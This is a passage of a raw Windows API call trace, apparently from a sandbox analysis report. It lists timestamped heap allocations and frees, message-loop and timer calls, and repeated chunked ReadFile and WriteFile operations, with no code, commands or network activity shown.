Flags=0x0, Size=0x8) returned 0x2e54e38 [0169.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0169.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0169.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0169.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0169.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0169.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0169.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0169.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x422a020 [0169.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0169.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0169.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x4443020 [0169.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0169.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0169.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x422a020 | out: hHeap=0x970000) returned 1 [0169.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0169.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0169.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0169.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0169.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0169.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x4221020 [0169.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x4443020 | out: hHeap=0x970000) returned 1 [0169.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0169.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0169.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x444c020 [0169.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x4221020 | out: hHeap=0x970000) returned 1 [0169.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0169.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0169.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0169.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0169.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0169.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0169.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0169.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0169.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0169.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0169.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0169.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0169.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0169.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0169.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0169.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0169.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0169.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0169.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0169.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0169.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0169.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0169.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0169.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0169.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0169.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0169.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0169.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0169.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0169.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0169.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0169.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0169.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0169.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x4110020 | out: hHeap=0x970000) returned 1 [0169.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0169.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0169.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0169.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0169.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0169.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0169.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0169.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0169.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0169.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0169.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0169.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0169.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0169.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0169.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0169.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0169.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0169.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x400e020 | out: hHeap=0x970000) returned 1 [0169.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0169.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0169.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0169.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0169.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0169.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x4332020 | out: hHeap=0x970000) returned 1 [0169.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0169.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0169.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0169.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0169.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0169.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0169.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0169.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0169.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0169.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0169.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0169.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3ef5020 | out: hHeap=0x970000) returned 1 [0169.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0169.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0169.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0169.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0169.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0169.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0169.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0169.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3de7020 | out: hHeap=0x970000) returned 1 [0170.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0170.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0170.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x3de8020 [0170.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x444c020 | out: hHeap=0x970000) returned 1 [0170.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0170.371] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0170.402] TranslateMessage (lpMsg=0x8cf708) returned 0 [0170.402] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0170.402] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0170.402] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0170.408] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0170.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0170.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0170.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0170.408] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0170.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0170.408] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0170.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0170.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0170.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0170.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0170.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0170.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0170.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0170.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x3efe020 [0170.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0170.439] WriteFile (in: hFile=0x2a0, lpBuffer=0x3efe020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x3efe020*, lpNumberOfBytesWritten=0x8cf5e4*=0x100000, lpOverlapped=0x0) returned 1 [0170.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0170.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3efe020 | out: hHeap=0x970000) returned 1 [0170.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0170.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0170.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0170.606] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0170.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0170.606] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0170.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0170.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0170.606] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0170.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0170.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0170.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0170.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0170.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0170.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0170.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0170.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0170.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0170.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0170.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0170.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0170.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0170.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0170.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0170.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x3ef5020 [0170.611] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0171.020] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0171.022] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0171.025] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0171.027] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0171.030] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0171.032] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0171.034] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0171.036] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0171.201] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0171.204] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0171.206] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0171.208] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0171.212] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0171.214] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0171.216] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0xc00, lpOverlapped=0x0) returned 1 [0171.216] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0171.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0171.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0171.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0171.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0171.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c00) returned 0x4001020 [0171.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3ef5020 | out: hHeap=0x970000) returned 1 [0171.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0171.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0171.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0171.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0171.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3de8020 | out: hHeap=0x970000) returned 1 [0171.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0171.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0171.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c00) returned 0x3de2020 [0171.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x4001020 | out: hHeap=0x970000) returned 1 [0171.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0171.579] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0171.580] TranslateMessage (lpMsg=0x8cf708) returned 0 [0171.580] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0171.580] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0171.580] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0171.580] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0171.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0171.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0171.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0171.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0171.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0171.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c00) returned 0x3ee0020 [0171.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0171.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3ee0020 | out: hHeap=0x970000) returned 1 [0171.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0171.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0171.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0171.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0171.997] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0171.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0171.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0171.997] 